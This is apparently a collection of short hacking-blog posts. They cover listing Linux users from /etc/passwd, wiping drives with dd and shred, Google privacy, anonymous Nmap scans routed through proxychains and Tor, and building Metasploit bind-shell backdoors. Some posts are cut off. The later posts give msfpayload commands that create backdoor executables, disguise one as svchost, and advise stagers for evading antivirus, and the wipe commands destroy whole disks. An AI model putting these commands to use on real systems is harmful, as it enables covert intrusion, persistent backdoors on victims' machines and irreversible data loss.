The /etc/passwd file in Linux is a file that contains a list of users, and information about those users. We can use this file to list all users that exist in our system. For example, using the “cat” command will output the whole file. Notice that every line starts with the username field.
oot@bt:~# cat /etc/passwd root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh libuuid:x:100:101::/var/lib/libuuid:/bin/sh syslog:x:101:103::/home/syslog:/bin/false sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin landscape:x:103:108::/var/lib/landscape:/bin/false messagebus:x:104:112::/var/run/dbus:/bin/false nobody:x:65534:65534:nobody:/nonexistent:/bin/sh mysql:x:105:113::/var/lib/mysql:/bin/false avahi:x:106:114::/var/run/avahi-daemon:/bin/false snort:x:107:115:Snort IDS:/var/log/snort:/bin/false statd:x:108:65534::/var/lib/nfs:/bin/false usbmux:x:109:46::/home/usbmux:/bin/false pulse:x:110:116::/var/run/pulse:/bin/false rtkit:x:111:117::/proc:/bin/false festival:x:112:29::/home/festival:/bin/false postgres:x:1000:1000::/home/postgres:/bin/sh
Now, if we want to refine our search and filter out all that extra information and just print the usernames, we can use the “awk” command like this:
awk -F ':' '{print $1}' /etc/passwdIn this command the “-F” option tells awk the separating field, in this case the colon “:”, and the {print $1} option, is just to print out the first field, which is the username field.
root@bt:~# awk -F ':' '{print $1}' /etc/passwd
root
daemon
bin
sys
sync
games
man
lp
mail
news
uucp
proxy
www-data
backup
list
irc
gnats
libuuid
syslog
sshd
landscape
messagebus
nobody
mysql
avahi
snort
statd
usbmux
pulse
rtkit
festival
postgres
If you’re planning on selling or decommission your old PC / Laptop, it is always a good practice to completely erase your hard drive data. There are tools that make recovering of files very easy. Even when these files have been overwritten by partitioning and installing new OS. Tools like Shred or DBAN make the process of securely erasing your hard drive pretty easy and straight forward. For most folks using “dd” should work.
dd if=/dev/zero of=/dev/hda
The above command will write your entire drive with zero; however, if you’re not satisfied, you could use “Shred,” which is use by government agencies like DOD. When using Shred the default is to make 25 passes over the hard drive or files by writing random data, but for our scenario 25 passes seem overkill, so we just change the default to something like 5 or 10, and by adding the “-z” option we tell Shred to write the last pass with zeroes.
shred -vz -n 10 /dev/hda
When booting from a live cd you don’t need the “-f” option, which pretty much takes ownership of data in order to overwrite it, but since you’re already root, you don’t need that option. I though it would be good to clarify that since I’ve seen post in which people use the “-f ” option unnecessarily.
Here’s a quick tutorial on how to remove your Google chrome web history. I doubt this will prevent Google from logging your online searches and activity, but at least is step of precaution.
1.Log in to your Google account, and click “Account Settings.”
If you use Google search engine, you might have seen the new Google ”privacy policy,” which will take effect in March 1st. This privacy policy has generated plenty of controversy, and it has many people worried because of the power it gives Google with information gathering through users searches, android smartphone users, etc. In a nutshell, the new policy will combine user data from services like YouTube, Gmail and Google search and create a single merged profile for each user of its services. As a result, 36 states General Attorneys send a letter to google explaining their concern.
“In the letter, the attorneys general said, “Google’s new privacy policy goes against a respect for privacy that Google has carefully cultivated as a way to attract consumers. It rings hollow to call [the ability of users] to exit the Google products ecosystem a ‘choice’ in an Internet economy where the clear majority of all Internet users use – and frequently rely on – at least one Google product on a regular basis.” The letter makes special mention of the potential problems the new privacy policy will have on Android-powered smartphone users, many of whom will find it “virtually impossible” to escape the policy without ditching their phones.”
Quoted from csoonline.com. full article (36 State AG Blast Google Privacy Policy Change)
In order to achieve complete anonymity while scanning a host, proxychains is as good as it gets because it uses Tor and Privoxy to tunnel the Nmap scan. In other words, you feed an application to proxychains, in this case Nmap, and it uses Tor for the scan. ProxyChains allows you to use SSH, Telnet, VNC, FTP and other network application from behind HTTP(HTTPS) and SOCKS(4/5) proxy servers. Proxychains allows TCP and DNS tunneling through proxies. Be aware that Proxychains only tunnels TCP and DNS; in other words, avoid using UDP and host discovering through ICMP (ping). The options for these are “-n” telling nmap to not resolve hostname, and “-PN” telling nmap not to ping the host. Also, the Tor network is slow, so be patient! I’m doing this in Backtrack; therefore, I will not go over the installation of Nmap, Proxychains, and Tor because they are all there. But you may want to check the proxychains.conf file and make sure you have this settings.
[ProxyList] # add proxy here ... # meanwile # defaults set to "tor" socks4 127.0.0.1 9050
The “-sTV” options tells nmap to do a full TCP connect and Version Detection, “-PN” tells nmap not to ping the remote host, “-n” not to resolve any dns records, and finally, “-p” options for the ports.
root@bt:~# proxychains nmap -sTV -PN -n -p21,22,25,80 64.13.134.52 ProxyChains-3.1 (http://proxychains.sf.net) Starting Nmap 5.35DC1 ( http://nmap.org ) at 2010-10-03 20:12 EDT |S-chain|-<>-127.0.0.1:9050-<><>-64.13.134.52:25-<--timeout |S-chain|-<>-127.0.0.1:9050-<><>-64.13.134.52:22-<><>-OK RTTVAR has grown to over 2.3 seconds, decreasing to 2.0 RTTVAR has grown to over 2.3 seconds, decreasing to 2.0 |S-chain|-<>-127.0.0.1:9050-<><>-64.13.134.52:21-<--timeout |S-chain|-<>-127.0.0.1:9050-<><>-64.13.134.52:80-<><>-OK RTTVAR has grown to over 2.3 seconds, decreasing to 2.0 RTTVAR has grown to over 2.3 seconds, decreasing to 2.0 |S-chain|-<>-127.0.0.1:9050-<><>-64.13.134.52:22-<><>-OK |S-chain|-<>-127.0.0.1:9050-<><>-64.13.134.52:80-<><>-OK Nmap scan report for 64.13.134.52 Host is up (12s latency). PORT STATE SERVICE VERSION 21/tcp closed ftp 22/tcp open ssh OpenSSH 4.3 (protocol 2.0) 25/tcp closed smtp 80/tcp open http Apache httpd 2.2.3 ((CentOS)) Service detection performed. Please report any incorrect results at http://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 44.64 seconds
There are different ways to drop a backdoor on a target machine with meterpreter. For example, netcat can be uploaded to the victim and with a few registry hacks the backdoor runs when the user login, allowing for shell access; however, there are a few drawbacks with this method. First, it requires to edit the registry and creating new keys (lengthy process). Second, upon the user login you can see netcat running for a split second and closing. It doesn’t take a savvy user to know something is up. And third, is an unauthenticated backdoor, which means is open for anyone. The two approaches I’m taking here are also unauthenticated which is not recommended, but sometimes that is the only choice, and what is more important, they are already built into metasploit.
The first method is the payload “shell_bind_tcp” which is the equibalent of netcat, but without having to do any registry editing. Pauldotcom has an excellent tutorial about this. For this tutorial I’m assuming we got a meterpreter session going.
First, we create our backdoor.
msfpayload windows/shell_bind_tcp RHOST=192.168.1.100,LPORT=4444 x > evil.exe
RHOST is the remote box where you backdoor will be running waiting for connections. Read the rest of this entry »
One of the cool features of Metasploit is the ability to encode your payload into an executable; furthermore, msfencode “-x” option allows you to select a profile, which could be a legit executable like: putty, calc, notepad, etc, to embed your payload, and; therefore, making it more difficult to detect. Now, when trying to bypass antivirus, it is best to use a “stager” rather than a full “payload”…. why? Well, a stager is a small piece of code that allocates in memory, open network port to communicate with the framework, and then it downloads the rest of the payload. A stager is very small. It’s because of its size that antivirus have a hard time detecting it. However, a full payload has everything needed to execute. So first we will create an executable using a single payload, and put it through AV scans.
NOTE: every time you see “>” inside the scripts, it’s “>”
msfpayload windows/shell_bind_tcp RHOST=192.168.1.100,LPORT=4444 x > svchost10.exe
Now, let’s put it through AV scans, and….
Designed By :
